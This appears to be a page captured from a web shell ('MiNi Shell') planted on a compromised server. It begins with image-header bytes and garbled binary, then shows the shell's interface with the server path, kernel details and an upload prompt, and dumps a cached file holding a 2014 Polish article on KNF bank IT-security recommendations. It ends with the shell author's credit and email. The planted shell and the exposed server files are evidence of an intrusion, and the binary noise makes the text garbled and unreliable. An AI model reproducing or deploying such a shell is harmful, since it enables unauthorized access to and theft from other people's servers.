JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/93/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/cache/93/93428a5f736093e7e404811924aaa5b5.bin

a:2:{i:0;a:2:{i:0;s:11974:" 
                    
                    <h3 class="title" itemprop="headline">Do końca roku banki muszą wdrożyć nowe zalecenia KNF</h3>
                    <p><span class="glyphicon glyphicon-time" aria-hidden="true"></span> <strong itemprop="datePublished"> 04-12-2014, 00:00</strong>
                        <meta itemprop="dateModified" content=" 04-12-2014, 00:00"/>
                        <div class="hide" itemprop="description">
	Do 31 grudnia wszystkie banki w Polsce powinny dostosować swoje środowisko teleinformatyczne do zaleceń zawartych w nowelizacji do Rekomendacji D Komisji Nadzoru Finansowego.&nbsp;</div>
                        <div class="hide" itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
                            <meta itemprop="name" content="rachunkowosc.org">
                            <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
                                <meta itemprop="url" content="https://www.rachunkowosc.org/images/loga/rachunkowosc.jpg">
                            </div>
                        </div>
                        <div class="hide" itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
                            <meta itemprop="url" content="https://common.v-manager.pl/uploads/images/articles/13321/crop/800x600/aa1a3f5a87-889278001571969396.webp">
                        </div>
                        <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://www.rachunkowosc.org/artykuly/szczegoly/13321"/>
                        
                                        </p>

                    <div class="lorem">
                        <p>
	<strong>Do 31 grudnia wszystkie banki w Polsce powinny dostosować swoje środowisko teleinformatyczne do zaleceń zawartych w nowelizacji do Rekomendacji D Komisji Nadzoru Finansowego. Oprócz dostosowania infrastruktury, banki zobowiązane są do sformalizowania zasad dotyczących bezpieczeństwa informacji i sprawnego zarządzania obszarem IT.</strong></p>
<p>
	Postęp technologiczny, jaki dokonał się od momentu wprowadzenia Rekomendacji D w 2002 roku, oraz systematyczny wzrost znaczenia obszaru technologii informacyjnej dla działalności banków sprawiły, że dotychczasowe rozwiązania w zakresie bezpieczeństwa stały się niewystarczające.  Zaistniała zatem konieczność nowego uregulowania ochrony przed ryzykiem związanym z procesami IT w bankach. Dotyczy to przede wszystkim bezpieczeństwa środowiska teleinformatycznego i przepływu informacji.</p>
<p>
	<strong>Co nowego?</strong></p>
<p>
	Kiedy w styczniu 2002r. weszła w życie pierwsza wersja Rekomendacji D, rachunek internetowy był postrzegany jako ekstrawagancki dodatek do właściwej obsługi w banku. Nikt nie myślał jeszcze o bankowości mobilnej, płatnościach zbliżeniowych czy przechowywaniu danych w chmurze. Obecnie dzięki rozwojowi technologii i zmianie stylu życia, zmieniły się również przyzwyczajenia klientów, a banki poszukują integracji swoich usług ze smartfonami i zaczynają wykorzystywać potencjał serwisów społecznościowych. Wraz z tymi zmianami pojawiły się jednak nowe, nieznane dotąd zagrożenia, które dotyczą coraz szerszego zakresu danych przetwarzanych przez banki.</p>
<p>
	Nowa wersja dokumentu zawiera 22 rekomendacje dotyczące m.in. zasad współpracy pomiędzy obszarami biznesowymi i technicznymi, zarządzania obszarem technologii informacyjnej i bezpieczeństwem środowiska IT.</p>
<p>
	Przed bankami został postawiony szereg nowych wymagań dotyczących bezpieczeństwa IT oraz zastosowania narzędzi umożliwiających obserwację procesów  zachodzących  w  sieci – mówi Grzegorz Oleksy, dyrektor firmy Axence oferującej oprogramowanie Axence nVision do monitorowania bezpieczeństwa sieci firmowej. – Rekomendacja wymaga m.in. stworzenia odpowiedniej architektury wewnętrznych powiązań i podkreśla konieczność współpracy departamentów banku w tworzeniu spójnego oraz bezpiecznego systemu wykorzystującego nowoczesne technologie – tłumaczy.</p>
<p>
	<strong>Największe wyzwania stojące przed bankami</strong></p>
<p>
	Nowe wytyczne największy nacisk kładą na sformalizowanie i wdrożenie zasad dotyczących zarządzania infrastrukturą teleinformatyczną, w tym jej architekturą, poszczególnymi komponentami, wydajnością i pojemnością oraz dokumentacją. Nowelizacja dokumentu w pewien sposób „wymusza” więc na Zarządzie Banku rzetelną weryfikację, czy aktualnie stosowane rozwiązania teleinformatyczne efektywnie wspierają działalność placówki. Rekomendacja D wzywa banki do opracowania i wdrożenia procedur obejmujących obszar technologii wspólnie ze strategią działania banku. W związku z jej wprowadzeniem, zaleca się również sformalizowanie procedur związanych z tworzeniem systemów, a także dostępem do technologii i baz danych. Nowe przepisy wskazują, że banki powinny podejść do tych kwestii poprzez tworzenie spójnej struktury systemu, a nie rozwiązania tymczasowe, powstające na zasadzie „łatania” istniejącego już środowiska kolejnymi aplikacjami lub funkcjonalnościami.</p>
<p>
	Okazuje się bowiem, że banki często realizują zalecenie do rekomendacji właśnie jako szereg niepowiązanych ze sobą inicjatyw. Tymczasem, wdrożenie jej jako całościowego projektu, może przynieść znacznie większe korzyści. Dla niektórych banków spółdzielczych, wdrożenie nowych zasad jest szansą na wprowadzenie nowoczesnego zarządzania zasobami IT. Traktując proces zmian jako kompleksowy projekt, bank może nie tylko spełnić zalecenia KNF, ale też dostosować się do wymogów stawianych przed GIODO, ISO27001, a nawet audytów finansowych SarOX.</p>
<p>
	<strong>Rekomendacja D to nie tylko sprawa działu IT</strong></p>
<p>
	Choć zapisy dokumentu dotyczą spraw związanych z obszarami teleinformatyki, jej treść skierowana jest nie tylko do działu IT, ale przede wszystkim Zarządu Banku. Rekomendacja nakłada na Radę Nadzorczą obowiązek kontroli funkcjonowania obszarów technologii informacyjnej i bezpieczeństwa IT, natomiast na Zarząd zapewnienie poprawnego i efektywnego administrowania powyższymi obszarami. Wyzwaniem stojącym przed bankami, jest bowiem nie tylko skoordynowanie wielu równolegle wykonywanych czynności, ale także zorganizowanie sprawnego systemu raportowania dla kierownictwa, na podstawie którego możliwe będzie szybkie reagowanie i podejmowanie decyzji. Zarząd może zatem zlecić swoim pracownikom ocenę stanu rzeczy i wystosowanie sugestii odnośnie proponowanych działań naprawczych, dostosowujących infrastrukturę do wymogów. Jednak nie należy bagatelizować również kwestii przeprowadzenia niezależnego audytu przez firmę zewnętrzną. W tym przypadku działania komplementarne dadzą znacznie lepsze efekty niż powierzenie całej odpowiedzialności działowi IT.</p>
<p>
	<strong>Praktyczne korzyści wynikające z wdrożenia nowych zasad</strong></p>
<p>
	Świadomość, jak ważna jest gwarancja bezpieczeństwa teleinformatycznego  w nieustannie zmieniającym się świecie, sprawiła, że część banków, w zgodzie z zaleceniami Rekomendacji D, dokonała już wdrożenia nowych systemów zarządzania infrastrukturą IT.<br />
	Dobrym przykładem może być Bank Spółdzielczy w Raciążu – mówi Grzegorz Oleksy. - Zarząd banku, mając na uwadze potrzebę podniesienia bezpieczeństwa danych,  postanowił zgłosić się do nas w sprawie dokonania analizy potrzeb w zakresie bezpieczeństwa środowiska IT. Na podstawie konsultacji, Zarząd podjął decyzję o wdrożeniu oprogramowania Axence nVision Pro.  Postawiono na wdrożenie wszystkich modułów funkcjonalnych aplikacji, aby tym lepiej spełnić wytyczne KNF zawarte w Rekomendacji D. Zgodnie z oczekiwaniami, administratorzy zyskali wiedzę na temat urządzeń podłączanych w sieci, zcentralizowana została baza danych o zainstalowanym sprzęcie i oprogramowaniu, a zgłaszane problemy są szybciej i sprawniej rozwiązywane – wyjaśnia.</p>
<p>
	Wszystko to w rzeczywistości ma niebagatelny wpływ na prestiż banku i jego funkcjonowanie. Wdrożenie w bankach zaleceń KNF pozwoli również zagwarantować klientom większe poczucie bezpieczeństwa oraz zwiększyć ich zaufanie do jednostek finansowych, a także oferowanych przez banki udogodnień opartych o systemy teleinformatyczne.</p>
<p>
	Zarząd banku powinien zatem patrzeć na zalecenia Rekomendacji D nie, jak na dodatkowe koszty, obowiązki i obostrzenia, ale jak na możliwość uporządkowania i zmodernizowania struktury wewnętrznej firmy, widząc w tym przede wszystkim korzyść dla siebie. Tym samym warto wprowadzać zmiany i podejmować inwestycje w sposób strategiczny i długofalowy, a nie na zasadzie rozwiązań tymczasowych.</p>                        
                         


                           
                    </div>
                    
                    <div class="text-center">
                                        </div>

                                            
                      
                        
                        
                    
                                        
                                            <div class="nav-table tags mt05">
                            <div>Tagi:</div>    
                            <div>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=KNF" class="label label-default">KNF</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Komisja+Nadzoru+Finansowego" class="label label-default">Komisja Nadzoru Finansowego</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Rekomendacja+D" class="label label-default">Rekomendacja D</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=kodeks+ITIL" class="label label-default">kodeks ITIL</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=plan+wdrożeniowy" class="label label-default">plan wdrożeniowy</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=poziom+bezpieczeństwa+IT" class="label label-default">poziom bezpieczeństwa IT</a>
                                                            </div>
                        </div>
                                            
                        
                    <div id="fb-root"></div>
                    <!--script async defer crossorigin="anonymous" src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0" nonce="2g9iczzS"></script-->
                    
<script>
//<![CDATA[
var lx=!1;window.addEventListener("scroll",function(){(0!=document.documentElement.scrollTop&&!1===lx||0!=document.body.scrollTop&&!1===lx)&&(!function(){var e=document.createElement("script");e.type="text/javascript",e.async=!0,e.src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(),lx=!0)},!0);
//]]>
</script>
                    
                    <div class="social text-center mb1">
                        <div class="fb-like" data-href="https://www.rachunkowosc.org/artykuly/szczegoly/13321_do-konca-roku-banki-musza-wdrozyc-nowe-zalecenia-knf" data-width="" data-layout="button" data-action="like" data-show-faces="false" data-share="true"></div>
                    </div>

                    
                    <div id="articles">    
                        
                    
                                    ";i:1;N;}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:2:{i:0;s:13:"article_13321";i:1;s:8:"articles";}s:4:"data";a:2:{s:32:"45e1322beabfc3cb1fe381f34f1f979d";s:21:"0.01005500 1746278140";s:32:"9f4ebfa1b76d6bc6617aec9034853422";s:21:"0.22954000 1749980350";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com